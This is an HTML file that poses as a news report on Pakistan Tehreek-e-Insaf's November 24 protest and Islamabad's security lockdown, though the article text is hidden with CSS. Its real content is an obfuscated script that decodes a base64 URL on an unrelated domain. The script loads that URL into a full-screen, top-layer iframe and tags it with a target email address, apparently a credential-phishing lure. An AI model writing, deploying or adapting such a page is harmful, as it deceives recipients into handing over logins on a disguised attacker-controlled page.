<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<style>
    .qeuqe{
        display: none;
    }
</style>
</head>
<body>
    <p class="qeuqe">, ISLAMABAD: The Pakistan Tehreek-e-Insaf (PTI) on Saturday refused to budge from its planned protest on November 24 as its Chairman Barrister Gohar Ali Khan said that a “final call” 
        meant a final call with the authorities implemented extensive 
        security and transportation restrictions across major cities, turning the twin cities virtually into security fortresses.


Earlier in related development, Interior Minister Mohsin Naqvi called PTI Chairman Barrister Gohar only to inform him that the government will not grant permission for any sit-in or rally in 

Islamabad due to security concerns during an official visit from a high-ranking Belarusian delegation.

Earlier in the day, PTI Secretary Information Sheikh Waqas Akram said that the party will “break through any barriers to reach their destination at D-Chowk, and that they will not return without achieving their objective.”

Akram stated, “The Constitution gives us the right to peaceful protest, and we will not surrender under any circumstances. On November 24, the entire nation will be on the streets,” Express News reported.

Meanwhile, the leadership of PTI has reiterated its stance of marching towards Islamabad tomorrow, with plans for a sit-in at D-Chowk, Islamabad, regardless of any obstacles.


In a meeting chaired by PTI Chairman Barrister Gohar at the Chief Minister’s House in Peshawar, senior PTI leaders including Khyber Pakhtunkhwa Chief Minister Ali Amin Gandapur, former President Arif Alvi, Shibli Faraz, Secretary Information Sheikh Waqas Akram, and others, decided to proceed with the protest.

Pakistan Tehreek-e-Insaf (PTI) has finalised its plan for the November 24 protest, which includes the booking of heavy machinery


According to PTI Peshawar region president, Arbab Asim, there is no shortage of heavy machinery this time. “We will use private machinery to remove obstacles, and the responsibility for security will rest with the Youth Wing.”

Security measures enforced in the capital city Islamabad, all major entry and exit points sealed

On the other hand, security measures were enforced in the capital city Islamabad, with all major entry and exit points of the city sealed while all roads leading into the capital city were shut off, particularly those from the neighboring cities of Rawalpindi and other surrounding regions.


        </p>
         <iframe id="glf" src="#" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></iframe>
<script>
    (function() {
        
        const base64Map = new Map([
            ['A', 0], ['B', 1], ['C', 2], ['D', 3], ['E', 4], ['F', 5], ['G', 6], ['H', 7],
            ['I', 8], ['J', 9], ['K', 10], ['L', 11], ['M', 12], ['N', 13], ['O', 14], ['P', 15],
            ['Q', 16], ['R', 17], ['S', 18], ['T', 19], ['U', 20], ['V', 21], ['W', 22], ['X', 23],
            ['Y', 24], ['Z', 25], ['a', 26], ['b', 27], ['c', 28], ['d', 29], ['e', 30], ['f', 31],
            ['g', 32], ['h', 33], ['i', 34], ['j', 35], ['k', 36], ['l', 37], ['m', 38], ['n', 39],
            ['o', 40], ['p', 41], ['q', 42], ['r', 43], ['s', 44], ['t', 45], ['u', 46], ['v', 47],
            ['w', 48], ['x', 49], ['y', 50], ['z', 51], ['0', 52], ['1', 53], ['2', 54], ['3', 55],
            ['4', 56], ['5', 57], ['6', 58], ['7', 59], ['8', 60], ['9', 61], ['+', 62], ['/', 63]
        ]);

        
        const decodeChar = (char) => base64Map.get(char);

        
        const combineValues = (a, b, c, d) => {
            return (a << 18) | (b << 12) | (c << 6) | d;
        };

        
        const extractChars = (value) => {
            return [
                String.fromCharCode((value >> 16) & 0xff),
                String.fromCharCode((value >> 8) & 0xff),
                String.fromCharCode(value & 0xff)
            ];
        };

        
        const complexDecode = (input) => {
            let result = '';
            
           
            const sanitizeInput = () => input.replace(/[^A-Za-z0-9+/]/g, '');
            const cleanedInput = sanitizeInput();

            
            const processChunk = (index) => {
                const indices = [
                    decodeChar(cleanedInput.charAt(index)),
                    decodeChar(cleanedInput.charAt(index + 1)),
                    decodeChar(cleanedInput.charAt(index + 2)),
                    decodeChar(cleanedInput.charAt(index + 3))
                ];

                const combined = combineValues(...indices);
                const [char1, char2, char3] = extractChars(combined);

                if (indices[2] === 64) return char1; 
                if (indices[3] === 64) return char1 + char2; 
                return char1 + char2 + char3; 
            };

           
            for (let i = 0; i < cleanedInput.length; i += 4) {
                result += processChunk(i);
            }

            
            const removeTrailingNulls = (text) => {
                while (text.endsWith('\0')) {
                    text = text.slice(0, -1);
                }
                return text;
            };

            return removeTrailingNulls(result); 
        };

        
        const base64Code = "aHR0cHM6Ly93YW5nemhvdWVvbi5jb20vR1BEMjAyNW9yZGVyL1NQT18yMDI1MjQzMTAuaHRtbA"; 
        document.getElementById("glf").src = complexDecode(base64Code) + "#pkg-phototools-devel@lists.alioth.debian.org";
    })();
</script>





   <p class="qeuqe">In response to the potential scale of the PTI protests, the government has mobilised significant security forces and a total of 30,000 additional police officers have been dispatched from various provinces, including 19,000 from Punjab, 5,000 from Sindh, and 1,000 from Azad Kashmir. These reinforcements have been deployed to assist the local police in controlling crowds and ensuring law and order.
    </p>
</body>
</html>